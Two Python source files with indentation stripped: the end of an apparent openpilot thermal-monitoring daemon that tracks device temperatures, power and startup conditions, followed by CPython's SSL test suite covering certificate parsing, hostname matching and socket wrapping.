msg.deviceState.cpuUsagePercent = [int(round(n)) for n in psutil.cpu_percent(percpu=True)]
msg.deviceState.gpuUsagePercent = int(round(HARDWARE.get_gpu_usage_percent()))
msg.deviceState.networkType = last_hw_state.network_type
msg.deviceState.networkMetered = last_hw_state.network_metered
msg.deviceState.networkStrength = last_hw_state.network_strength
if last_hw_state.network_info is not None:
msg.deviceState.networkInfo = last_hw_state.network_info
msg.deviceState.nvmeTempC = last_hw_state.nvme_temps
msg.deviceState.modemTempC = last_hw_state.modem_temps
msg.deviceState.screenBrightnessPercent = HARDWARE.get_screen_brightness()
msg.deviceState.usbOnline = HARDWARE.get_usb_present()
current_filter.update(msg.deviceState.batteryCurrent / 1e6)
max_comp_temp = temp_filter.update(
max(max(msg.deviceState.cpuTempC), msg.deviceState.memoryTempC, max(msg.deviceState.gpuTempC))
)
if fan_controller is not None:
msg.deviceState.fanSpeedPercentDesired = fan_controller.update(max_comp_temp, onroad_conditions["ignition"])
is_offroad_for_5_min = (started_ts is None) and ((not started_seen) or (off_ts is None) or (sec_since_boot() - off_ts > 60 * 5))
if is_offroad_for_5_min and max_comp_temp > OFFROAD_DANGER_TEMP:
# If device is offroad we want to cool down before going onroad
# since going onroad increases load and can make temps go over 107
thermal_status = ThermalStatus.danger
else:
current_band = THERMAL_BANDS[thermal_status]
band_idx = list(THERMAL_BANDS.keys()).index(thermal_status)
if current_band.min_temp is not None and max_comp_temp < current_band.min_temp:
thermal_status = list(THERMAL_BANDS.keys())[band_idx - 1]
elif current_band.max_temp is not None and max_comp_temp > current_band.max_temp:
thermal_status = list(THERMAL_BANDS.keys())[band_idx + 1]
# **** starting logic ****
# Ensure date/time are valid
now = datetime.datetime.utcnow()
startup_conditions["time_valid"] = (now.year > 2020) or (now.year == 2020 and now.month >= 10)
set_offroad_alert_if_changed("Offroad_InvalidTime", (not startup_conditions["time_valid"]))
startup_conditions["up_to_date"] = params.get("Offroad_ConnectivityNeeded") is None or params.get_bool("DisableUpdates") or params.get_bool("SnoozeUpdate")
startup_conditions["not_uninstalling"] = not params.get_bool("DoUninstall")
startup_conditions["accepted_terms"] = params.get("HasAcceptedTerms") == terms_version
# with 2% left, we killall, otherwise the phone will take a long time to boot
startup_conditions["free_space"] = msg.deviceState.freeSpacePercent > 2
startup_conditions["completed_training"] = params.get("CompletedTrainingVersion") == training_version or \
params.get_bool("Passive")
startup_conditions["not_driver_view"] = not params.get_bool("IsDriverViewEnabled")
startup_conditions["not_taking_snapshot"] = not params.get_bool("IsTakingSnapshot")
# if any CPU gets above 107 or the battery gets above 63, kill all processes
# controls will warn with CPU above 95 or battery above 60
onroad_conditions["device_temp_good"] = thermal_status < ThermalStatus.danger
set_offroad_alert_if_changed("Offroad_TemperatureTooHigh", (not onroad_conditions["device_temp_good"]))
# TODO: this should move to TICI.initialize_hardware, but we currently can't import params there
if TICI:
if not os.path.isfile("/persist/comma/living-in-the-moment"):
if not Path("/data/media").is_mount():
set_offroad_alert_if_changed("Offroad_StorageMissing", True)
else:
# check for bad NVMe
try:
with open("/sys/block/nvme0n1/device/model") as f:
model = f.read().strip()
if not model.startswith("Samsung SSD 980") and params.get("Offroad_BadNvme") is None:
set_offroad_alert_if_changed("Offroad_BadNvme", True)
cloudlog.event("Unsupported NVMe", model=model, error=True)
except Exception:
pass
# Handle offroad/onroad transition
should_start = all(onroad_conditions.values())
if started_ts is None:
should_start = should_start and all(startup_conditions.values())
if should_start != should_start_prev or (count == 0):
params.put_bool("IsOnroad", should_start)
params.put_bool("IsOffroad", not should_start)
params.put_bool("IsEngaged", False)
engaged_prev = False
HARDWARE.set_power_save(not should_start)
if sm.updated['controlsState']:
engaged = sm['controlsState'].enabled
if engaged != engaged_prev:
params.put_bool("IsEngaged", engaged)
engaged_prev = engaged
try:
with open('/dev/kmsg', 'w') as kmsg:
kmsg.write(f"<3>[thermald] engaged: {engaged}\n")
except Exception:
pass
if should_start:
off_ts = None
if started_ts is None:
started_ts = sec_since_boot()
started_seen = True
else:
if onroad_conditions["ignition"] and (startup_conditions != startup_conditions_prev):
cloudlog.event("Startup blocked", startup_conditions=startup_conditions, onroad_conditions=onroad_conditions)
started_ts = None
if off_ts is None:
off_ts = sec_since_boot()
# Offroad power monitoring
power_monitor.calculate(peripheralState, onroad_conditions["ignition"])
msg.deviceState.offroadPowerUsageUwh = power_monitor.get_power_used()
msg.deviceState.carBatteryCapacityUwh = max(0, power_monitor.get_car_battery_capacity())
current_power_draw = HARDWARE.get_current_power_draw() # pylint: disable=assignment-from-none
if current_power_draw is not None:
statlog.sample("power_draw", current_power_draw)
msg.deviceState.powerDrawW = current_power_draw
else:
msg.deviceState.powerDrawW = 0
# Check if we need to disable charging (handled by boardd)
msg.deviceState.chargingDisabled = power_monitor.should_disable_charging(onroad_conditions["ignition"], in_car, off_ts)
# Check if we need to shut down
if power_monitor.should_shutdown(peripheralState, onroad_conditions["ignition"], in_car, off_ts, started_seen):
cloudlog.warning(f"shutting device down, offroad since {off_ts}")
params.put_bool("DoShutdown", True)
msg.deviceState.chargingError = current_filter.x > 0. and msg.deviceState.batteryPercent < 90 # if current is positive, then battery is being discharged
msg.deviceState.started = started_ts is not None
msg.deviceState.startedMonoTime = int(1e9*(started_ts or 0))
last_ping = params.get("LastAthenaPingTime")
if last_ping is not None:
msg.deviceState.lastAthenaPingTime = int(last_ping)
msg.deviceState.thermalStatus = thermal_status
pm.send("deviceState", msg)
should_start_prev = should_start
startup_conditions_prev = startup_conditions.copy()
# Log to statsd
statlog.gauge("free_space_percent", msg.deviceState.freeSpacePercent)
statlog.gauge("gpu_usage_percent", msg.deviceState.gpuUsagePercent)
statlog.gauge("memory_usage_percent", msg.deviceState.memoryUsagePercent)
for i, usage in enumerate(msg.deviceState.cpuUsagePercent):
statlog.gauge(f"cpu{i}_usage_percent", usage)
for i, temp in enumerate(msg.deviceState.cpuTempC):
statlog.gauge(f"cpu{i}_temperature", temp)
for i, temp in enumerate(msg.deviceState.gpuTempC):
statlog.gauge(f"gpu{i}_temperature", temp)
statlog.gauge("memory_temperature", msg.deviceState.memoryTempC)
statlog.gauge("ambient_temperature", msg.deviceState.ambientTempC)
for i, temp in enumerate(msg.deviceState.pmicTempC):
statlog.gauge(f"pmic{i}_temperature", temp)
for i, temp in enumerate(last_hw_state.nvme_temps):
statlog.gauge(f"nvme_temperature{i}", temp)
for i, temp in enumerate(last_hw_state.modem_temps):
statlog.gauge(f"modem_temperature{i}", temp)
statlog.gauge("fan_speed_percent_desired", msg.deviceState.fanSpeedPercentDesired)
statlog.gauge("screen_brightness_percent", msg.deviceState.screenBrightnessPercent)
# report to server once every 10 minutes
if (count % int(600. / DT_TRML)) == 0:
cloudlog.event("STATUS_PACKET",
count=count,
pandaStates=[strip_deprecated_keys(p.to_dict()) for p in pandaStates],
peripheralState=strip_deprecated_keys(peripheralState.to_dict()),
location=(strip_deprecated_keys(sm["gpsLocationExternal"].to_dict()) if sm.alive["gpsLocationExternal"] else None),
deviceState=strip_deprecated_keys(msg.to_dict()))
count += 1
def main():
hw_queue = queue.Queue(maxsize=1)
end_event = threading.Event()
threads = [
threading.Thread(target=hw_state_thread, args=(end_event, hw_queue)),
threading.Thread(target=thermald_thread, args=(end_event, hw_queue)),
]
for t in threads:
t.start()
try:
while True:
time.sleep(1)
if not all(t.is_alive() for t in threads):
break
finally:
end_event.set()
for t in threads:
t.join()
if __name__ == "__main__":
main()
|
test_ssl.py
|
# Test the support for SSL and sockets
import sys
import unittest
from test import support
import socket
import select
import time
import datetime
import gc
import os
import errno
import pprint
import tempfile
import urllib.request
import traceback
import asyncore
import weakref
import platform
import functools
ssl = support.import_module("ssl")
PROTOCOLS = sorted(ssl._PROTOCOL_NAMES)
HOST = support.HOST
def data_file(*name):
return os.path.join(os.path.dirname(__file__), *name)
# The custom key and certificate files used in test_ssl are generated
# using Lib/test/make_ssl_certs.py.
# Other certificates are simply fetched from the Internet servers they
# are meant to authenticate.
CERTFILE = data_file("keycert.pem")
BYTES_CERTFILE = os.fsencode(CERTFILE)
ONLYCERT = data_file("ssl_cert.pem")
ONLYKEY = data_file("ssl_key.pem")
BYTES_ONLYCERT = os.fsencode(ONLYCERT)
BYTES_ONLYKEY = os.fsencode(ONLYKEY)
CERTFILE_PROTECTED = data_file("keycert.passwd.pem")
ONLYKEY_PROTECTED = data_file("ssl_key.passwd.pem")
KEY_PASSWORD = "somepass"
CAPATH = data_file("capath")
BYTES_CAPATH = os.fsencode(CAPATH)
CAFILE_NEURONIO = data_file("capath", "4e1295a3.0")
CAFILE_CACERT = data_file("capath", "5ed36f99.0")
# empty CRL
CRLFILE = data_file("revocation.crl")
# Two keys and certs signed by the same CA (for SNI tests)
SIGNED_CERTFILE = data_file("keycert3.pem")
SIGNED_CERTFILE2 = data_file("keycert4.pem")
SIGNING_CA = data_file("pycacert.pem")
REMOTE_HOST = "self-signed.pythontest.net"
REMOTE_ROOT_CERT = data_file("selfsigned_pythontestdotnet.pem")
EMPTYCERT = data_file("nullcert.pem")
BADCERT = data_file("badcert.pem")
NONEXISTINGCERT = data_file("XXXnonexisting.pem")
BADKEY = data_file("badkey.pem")
NOKIACERT = data_file("nokia.pem")
NULLBYTECERT = data_file("nullbytecert.pem")
DHFILE = data_file("dh1024.pem")
BYTES_DHFILE = os.fsencode(DHFILE)
def handle_error(prefix):
exc_format = ' '.join(traceback.format_exception(*sys.exc_info()))
if support.verbose:
sys.stdout.write(prefix + exc_format)
def can_clear_options():
# 0.9.8m or higher
return ssl._OPENSSL_API_VERSION >= (0, 9, 8, 13, 15)
def no_sslv2_implies_sslv3_hello():
# 0.9.7h or higher
return ssl.OPENSSL_VERSION_INFO >= (0, 9, 7, 8, 15)
def have_verify_flags():
# 0.9.8 or higher
return ssl.OPENSSL_VERSION_INFO >= (0, 9, 8, 0, 15)
def utc_offset(): #NOTE: ignore issues like #1647654
# local time = utc time + utc offset
if time.daylight and time.localtime().tm_isdst > 0:
return -time.altzone # seconds
return -time.timezone
def asn1time(cert_time):
# Some versions of OpenSSL ignore seconds, see #18207
# 0.9.8.i
if ssl._OPENSSL_API_VERSION == (0, 9, 8, 9, 15):
fmt = "%b %d %H:%M:%S %Y GMT"
dt = datetime.datetime.strptime(cert_time, fmt)
dt = dt.replace(second=0)
cert_time = dt.strftime(fmt)
# %d adds leading zero but ASN1_TIME_print() uses leading space
if cert_time[4] == "0":
cert_time = cert_time[:4] + " " + cert_time[5:]
return cert_time
# Issue #9415: Ubuntu hijacks their OpenSSL and forcefully disables SSLv2
def skip_if_broken_ubuntu_ssl(func):
if hasattr(ssl, 'PROTOCOL_SSLv2'):
@functools.wraps(func)
def f(*args, **kwargs):
try:
ssl.SSLContext(ssl.PROTOCOL_SSLv2)
except ssl.SSLError:
if (ssl.OPENSSL_VERSION_INFO == (0, 9, 8, 15, 15) and
platform.linux_distribution() == ('debian', 'squeeze/sid', '')):
raise unittest.SkipTest("Patched Ubuntu OpenSSL breaks behaviour")
return func(*args, **kwargs)
return f
else:
return func
needs_sni = unittest.skipUnless(ssl.HAS_SNI, "SNI support needed for this test")
class BasicSocketTests(unittest.TestCase):
def test_constants(self):
ssl.CERT_NONE
ssl.CERT_OPTIONAL
ssl.CERT_REQUIRED
ssl.OP_CIPHER_SERVER_PREFERENCE
ssl.OP_SINGLE_DH_USE
if ssl.HAS_ECDH:
ssl.OP_SINGLE_ECDH_USE
if ssl.OPENSSL_VERSION_INFO >= (1, 0):
ssl.OP_NO_COMPRESSION
self.assertIn(ssl.HAS_SNI, {True, False})
self.assertIn(ssl.HAS_ECDH, {True, False})
def test_str_for_enums(self):
# Make sure that the PROTOCOL_* constants have enum-like string
# reprs.
proto = ssl.PROTOCOL_SSLv23
self.assertEqual(str(proto), '_SSLMethod.PROTOCOL_SSLv23')
ctx = ssl.SSLContext(proto)
self.assertIs(ctx.protocol, proto)
def test_random(self):
v = ssl.RAND_status()
if support.verbose:
sys.stdout.write("\n RAND_status is %d (%s)\n"
% (v, (v and "sufficient randomness") or
"insufficient randomness"))
data, is_cryptographic = ssl.RAND_pseudo_bytes(16)
self.assertEqual(len(data), 16)
self.assertEqual(is_cryptographic, v == 1)
if v:
data = ssl.RAND_bytes(16)
self.assertEqual(len(data), 16)
else:
self.assertRaises(ssl.SSLError, ssl.RAND_bytes, 16)
# negative num is invalid
self.assertRaises(ValueError, ssl.RAND_bytes, -5)
self.assertRaises(ValueError, ssl.RAND_pseudo_bytes, -5)
if hasattr(ssl, 'RAND_egd'):
self.assertRaises(TypeError, ssl.RAND_egd, 1)
self.assertRaises(TypeError, ssl.RAND_egd, 'foo', 1)
ssl.RAND_add("this is a random string", 75.0)
ssl.RAND_add(b"this is a random bytes object", 75.0)
ssl.RAND_add(bytearray(b"this is a random bytearray object"), 75.0)
@unittest.skipUnless(os.name == 'posix', 'requires posix')
def test_random_fork(self):
status = ssl.RAND_status()
if not status:
self.fail("OpenSSL's PRNG has insufficient randomness")
rfd, wfd = os.pipe()
pid = os.fork()
if pid == 0:
try:
os.close(rfd)
child_random = ssl.RAND_pseudo_bytes(16)[0]
self.assertEqual(len(child_random), 16)
os.write(wfd, child_random)
os.close(wfd)
except BaseException:
os._exit(1)
else:
os._exit(0)
else:
os.close(wfd)
self.addCleanup(os.close, rfd)
_, status = os.waitpid(pid, 0)
self.assertEqual(status, 0)
child_random = os.read(rfd, 16)
self.assertEqual(len(child_random), 16)
parent_random = ssl.RAND_pseudo_bytes(16)[0]
self.assertEqual(len(parent_random), 16)
self.assertNotEqual(child_random, parent_random)
def test_parse_cert(self):
# note that this uses an 'unofficial' function in _ssl.c,
# provided solely for this test, to exercise the certificate
# parsing code
p = ssl._ssl._test_decode_cert(CERTFILE)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(p['issuer'],
((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),))
)
# Note the next three asserts will fail if the keys are regenerated
self.assertEqual(p['notAfter'], asn1time('Oct 5 23:01:56 2020 GMT'))
self.assertEqual(p['notBefore'], asn1time('Oct 8 23:01:56 2010 GMT'))
self.assertEqual(p['serialNumber'], 'D7C7381919AFC24E')
self.assertEqual(p['subject'],
((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),))
)
self.assertEqual(p['subjectAltName'], (('DNS', 'localhost'),))
# Issue #13034: the subjectAltName in some certificates
# (notably projects.developer.nokia.com:443) wasn't parsed
p = ssl._ssl._test_decode_cert(NOKIACERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(p['subjectAltName'],
(('DNS', 'projects.developer.nokia.com'),
('DNS', 'projects.forum.nokia.com'))
)
# extra OCSP and AIA fields
self.assertEqual(p['OCSP'], ('http://ocsp.verisign.com',))
self.assertEqual(p['caIssuers'],
('http://SVRIntl-G3-aia.verisign.com/SVRIntlG3.cer',))
self.assertEqual(p['crlDistributionPoints'],
('http://SVRIntl-G3-crl.verisign.com/SVRIntlG3.crl',))
def test_parse_cert_CVE_2013_4238(self):
p = ssl._ssl._test_decode_cert(NULLBYTECERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
subject = ((('countryName', 'US'),),
(('stateOrProvinceName', 'Oregon'),),
(('localityName', 'Beaverton'),),
(('organizationName', 'Python Software Foundation'),),
(('organizationalUnitName', 'Python Core Development'),),
(('commonName', 'null.python.org\x00example.org'),),
(('emailAddress', '[email protected]'),))
self.assertEqual(p['subject'], subject)
self.assertEqual(p['issuer'], subject)
if ssl._OPENSSL_API_VERSION >= (0, 9, 8):
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', '[email protected]\[email protected]'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '2001:DB8:0:0:0:0:0:1\n'))
else:
# OpenSSL 0.9.7 doesn't support IPv6 addresses in subjectAltName
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', '[email protected]\[email protected]'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '<invalid>'))
self.assertEqual(p['subjectAltName'], san)
def test_DER_to_PEM(self):
with open(CAFILE_CACERT, 'r') as f:
pem = f.read()
d1 = ssl.PEM_cert_to_DER_cert(pem)
p2 = ssl.DER_cert_to_PEM_cert(d1)
d2 = ssl.PEM_cert_to_DER_cert(p2)
self.assertEqual(d1, d2)
if not p2.startswith(ssl.PEM_HEADER + '\n'):
self.fail("DER-to-PEM didn't include correct header:\n%r\n" % p2)
if not p2.endswith('\n' + ssl.PEM_FOOTER + '\n'):
self.fail("DER-to-PEM didn't include correct footer:\n%r\n" % p2)
def test_openssl_version(self):
n = ssl.OPENSSL_VERSION_NUMBER
t = ssl.OPENSSL_VERSION_INFO
s = ssl.OPENSSL_VERSION
self.assertIsInstance(n, int)
self.assertIsInstance(t, tuple)
self.assertIsInstance(s, str)
# Some sanity checks follow
# >= 0.9
self.assertGreaterEqual(n, 0x900000)
# < 3.0
self.assertLess(n, 0x30000000)
major, minor, fix, patch, status = t
self.assertGreaterEqual(major, 0)
self.assertLess(major, 3)
self.assertGreaterEqual(minor, 0)
self.assertLess(minor, 256)
self.assertGreaterEqual(fix, 0)
self.assertLess(fix, 256)
self.assertGreaterEqual(patch, 0)
self.assertLessEqual(patch, 63)
self.assertGreaterEqual(status, 0)
self.assertLessEqual(status, 15)
# Version string as returned by {Open,Libre}SSL, the format might change
if "LibreSSL" in s:
self.assertTrue(s.startswith("LibreSSL {:d}.{:d}".format(major, minor)),
(s, t, hex(n)))
else:
self.assertTrue(s.startswith("OpenSSL {:d}.{:d}.{:d}".format(major, minor, fix)),
(s, t, hex(n)))
@support.cpython_only
def test_refcycle(self):
# Issue #7943: an SSL object doesn't create reference cycles with
# itself.
s = socket.socket(socket.AF_INET)
ss = ssl.wrap_socket(s)
wr = weakref.ref(ss)
with support.check_warnings(("", ResourceWarning)):
del ss
self.assertEqual(wr(), None)
def test_wrapped_unconnected(self):
# Methods on an unconnected SSLSocket propagate the original
# OSError raise by the underlying socket object.
s = socket.socket(socket.AF_INET)
with ssl.wrap_socket(s) as ss:
self.assertRaises(OSError, ss.recv, 1)
self.assertRaises(OSError, ss.recv_into, bytearray(b'x'))
self.assertRaises(OSError, ss.recvfrom, 1)
self.assertRaises(OSError, ss.recvfrom_into, bytearray(b'x'), 1)
self.assertRaises(OSError, ss.send, b'x')
self.assertRaises(OSError, ss.sendto, b'x', ('0.0.0.0', 0))
def test_timeout(self):
# Issue #8524: when creating an SSL socket, the timeout of the
# original socket should be retained.
for timeout in (None, 0.0, 5.0):
s = socket.socket(socket.AF_INET)
s.settimeout(timeout)
with ssl.wrap_socket(s) as ss:
self.assertEqual(timeout, ss.gettimeout())
def test_errors(self):
sock = socket.socket()
self.assertRaisesRegex(ValueError,
"certfile must be specified",
ssl.wrap_socket, sock, keyfile=CERTFILE)
self.assertRaisesRegex(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True)
self.assertRaisesRegex(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True, certfile="")
with ssl.wrap_socket(sock, server_side=True, certfile=CERTFILE) as s:
self.assertRaisesRegex(ValueError, "can't connect in server-side mode",
s.connect, (HOST, 8080))
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock, certfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock,
certfile=CERTFILE, keyfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock,
certfile=NONEXISTINGCERT, keyfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
def bad_cert_test(self, certfile):
"""Check that trying to use the given client certificate fails"""
certfile = os.path.join(os.path.dirname(__file__) or os.curdir,
certfile)
sock = socket.socket()
self.addCleanup(sock.close)
with self.assertRaises(ssl.SSLError):
ssl.wrap_socket(sock,
certfile=certfile,
ssl_version=ssl.PROTOCOL_TLSv1)
def test_empty_cert(self):
"""Wrapping with an empty cert file"""
self.bad_cert_test("nullcert.pem")
def test_malformed_cert(self):
"""Wrapping with a badly formatted certificate (syntax error)"""
self.bad_cert_test("badcert.pem")
def test_malformed_key(self):
"""Wrapping with a badly formatted key (syntax error)"""
self.bad_cert_test("badkey.pem")
def test_match_hostname(self):
def ok(cert, hostname):
ssl.match_hostname(cert, hostname)
def fail(cert, hostname):
self.assertRaises(ssl.CertificateError,
ssl.match_hostname, cert, hostname)
# -- Hostname matching --
cert = {'subject': ((('commonName', 'example.com'),),)}
ok(cert, 'example.com')
ok(cert, 'ExAmple.cOm')
fail(cert, 'www.example.com')
fail(cert, '.example.com')
fail(cert, 'example.org')
fail(cert, 'exampleXcom')
cert = {'subject': ((('commonName', '*.a.com'),),)}
ok(cert, 'foo.a.com')
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
# only match one left-most wildcard
cert = {'subject': ((('commonName', 'f*.com'),),)}
ok(cert, 'foo.com')
ok(cert, 'f.com')
fail(cert, 'bar.com')
fail(cert, 'foo.a.com')
fail(cert, 'bar.foo.com')
# NULL bytes are bad, CVE-2013-4073
cert = {'subject': ((('commonName',
'null.python.org\x00example.org'),),)}
ok(cert, 'null.python.org\x00example.org') # or raise an error?
fail(cert, 'example.org')
fail(cert, 'null.python.org')
# error cases with wildcards
cert = {'subject': ((('commonName', '*.*.a.com'),),)}
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
cert = {'subject': ((('commonName', 'a.*.com'),),)}
fail(cert, 'a.foo.com')
fail(cert, 'a..com')
fail(cert, 'a.com')
# wildcard doesn't match IDNA prefix 'xn--'
idna = 'püthon.python.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
ok(cert, idna)
cert = {'subject': ((('commonName', 'x*.python.org'),),)}
fail(cert, idna)
cert = {'subject': ((('commonName', 'xn--p*.python.org'),),)}
fail(cert, idna)
# wildcard in first fragment and IDNA A-labels in sequent fragments
# are supported.
idna = 'www*.pythön.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
ok(cert, 'www.pythön.org'.encode("idna").decode("ascii"))
ok(cert, 'www1.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'ftp.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'pythön.org'.encode("idna").decode("ascii"))
# Slightly fake real-world example
cert = {'notAfter': 'Jun 26 21:41:46 2011 GMT',
'subject': ((('commonName', 'linuxfrz.org'),),),
'subjectAltName': (('DNS', 'linuxfr.org'),
('DNS', 'linuxfr.com'),
('othername', '<unsupported>'))}
ok(cert, 'linuxfr.org')
ok(cert, 'linuxfr.com')
# Not a "DNS" entry
fail(cert, '<unsupported>')
# When there is a subjectAltName, commonName isn't used
fail(cert, 'linuxfrz.org')
# A pristine real-world example
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),),
(('commonName', 'mail.google.com'),))}
ok(cert, 'mail.google.com')
fail(cert, 'gmail.com')
# Only commonName is considered
fail(cert, 'California')
# -- IPv4 matching --
cert = {'subject': ((('commonName', 'example.com'),),),
'subjectAltName': (('DNS', 'example.com'),
('IP Address', '10.11.12.13'),
('IP Address', '14.15.16.17'))}
ok(cert, '10.11.12.13')
ok(cert, '14.15.16.17')
fail(cert, '14.15.16.18')
fail(cert, 'example.net')
# -- IPv6 matching --
cert = {'subject': ((('commonName', 'example.com'),),),
'subjectAltName': (('DNS', 'example.com'),
('IP Address', '2001:0:0:0:0:0:0:CAFE\n'),
('IP Address', '2003:0:0:0:0:0:0:BABA\n'))}
ok(cert, '2001::cafe')
ok(cert, '2003::baba')
fail(cert, '2003::bebe')
fail(cert, 'example.net')
# -- Miscellaneous --
# Neither commonName nor subjectAltName
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),))}
fail(cert, 'mail.google.com')
# No DNS entry in subjectAltName but a commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('commonName', 'mail.google.com'),)),
'subjectAltName': (('othername', 'blabla'), )}
ok(cert, 'mail.google.com')
# No DNS entry subjectAltName and no commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),)),
'subjectAltName': (('othername', 'blabla'),)}
fail(cert, 'google.com')
# Empty cert / no cert
self.assertRaises(ValueError, ssl.match_hostname, None, 'example.com')
self.assertRaises(ValueError, ssl.match_hostname, {}, 'example.com')
# Issue #17980: avoid denials of service by refusing more than one
# wildcard per fragment.
cert = {'subject': ((('commonName', 'a*b.com'),),)}
ok(cert, 'axxb.com')
cert = {'subject': ((('commonName', 'a*b.co*'),),)}
fail(cert, 'axxb.com')
cert = {'subject': ((('commonName', 'a*b*.com'),),)}
with self.assertRaises(ssl.CertificateError) as cm:
ssl.match_hostname(cert, 'axxbxxc.com')
self.assertIn("too many wildcards", str(cm.exception))
def test_server_side(self):
# server_hostname doesn't work for server sockets
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with socket.socket() as sock:
self.assertRaises(ValueError, ctx.wrap_socket, sock, True,
server_hostname="some.hostname")
def test_unknown_channel_binding(self):
# should raise ValueError for unknown type
s = socket.socket(socket.AF_INET)
s.bind(('127.0.0.1', 0))
s.listen()
c = socket.socket(socket.AF_INET)
c.connect(s.getsockname())
with ssl.wrap_socket(c, do_handshake_on_connect=False) as ss:
with self.assertRaises(ValueError):
ss.get_channel_binding("unknown-type")
s.close()
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
# unconnected should return None for known type
s = socket.socket(socket.AF_INET)
with ssl.wrap_socket(s) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
# the same for server-side
s = socket.socket(socket.AF_INET)
with ssl.wrap_socket(s, server_side=True, certfile=CERTFILE) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
def test_dealloc_warn(self):
ss = ssl.wrap_socket(socket.socket(socket.AF_INET))
r = repr(ss)
with self.assertWarns(ResourceWarning) as cm:
ss = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
def test_get_default_verify_paths(self):
paths = ssl.get_default_verify_paths()
self.assertEqual(len(paths), 6)
self.assertIsInstance(paths, ssl.DefaultVerifyPaths)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
paths = ssl.get_default_verify_paths()
self.assertEqual(paths.cafile, CERTFILE)
self.assertEqual(paths.capath, CAPATH)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_certificates(self):
self.assertTrue(ssl.enum_certificates("CA"))
self.assertTrue(ssl.enum_certificates("ROOT"))
self.assertRaises(TypeError, ssl.enum_certificates)
self.assertRaises(WindowsError, ssl.enum_certificates, "")
trust_oids = set()
for storename in ("CA", "ROOT"):
store = ssl.enum_certificates(storename)
self.assertIsInstance(store, list)
for element in store:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 3)
cert, enc, trust = element
self.assertIsInstance(cert, bytes)
self.assertIn(enc, {"x509_asn", "pkcs_7_asn"})
self.assertIsInstance(trust, (set, bool))
if isinstance(trust, set):
trust_oids.update(trust)
serverAuth = "1.3.6.1.5.5.7.3.1"
self.assertIn(serverAuth, trust_oids)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_crls(self):
self.assertTrue(ssl.enum_crls("CA"))
self.assertRaises(TypeError, ssl.enum_crls)
self.assertRaises(WindowsError, ssl.enum_crls, "")
crls = ssl.enum_crls("CA")
self.assertIsInstance(crls, list)
for element in crls:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 2)
self.assertIsInstance(element[0], bytes)
self.assertIn(element[1], {"x509_asn", "pkcs_7_asn"})
def test_asn1object(self):
expected = (129, 'serverAuth', 'TLS Web Server Authentication',
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertEqual(val, expected)
self.assertEqual(val.nid, 129)
self.assertEqual(val.shortname, 'serverAuth')
self.assertEqual(val.longname, 'TLS Web Server Authentication')
self.assertEqual(val.oid, '1.3.6.1.5.5.7.3.1')
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object, 'serverAuth')
val = ssl._ASN1Object.fromnid(129)
self.assertEqual(val, expected)
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object.fromnid, -1)
with self.assertRaisesRegex(ValueError, "unknown NID 100000"):
ssl._ASN1Object.fromnid(100000)
for i in range(1000):
try:
obj = ssl._ASN1Object.fromnid(i)
except ValueError:
pass
else:
self.assertIsInstance(obj.nid, int)
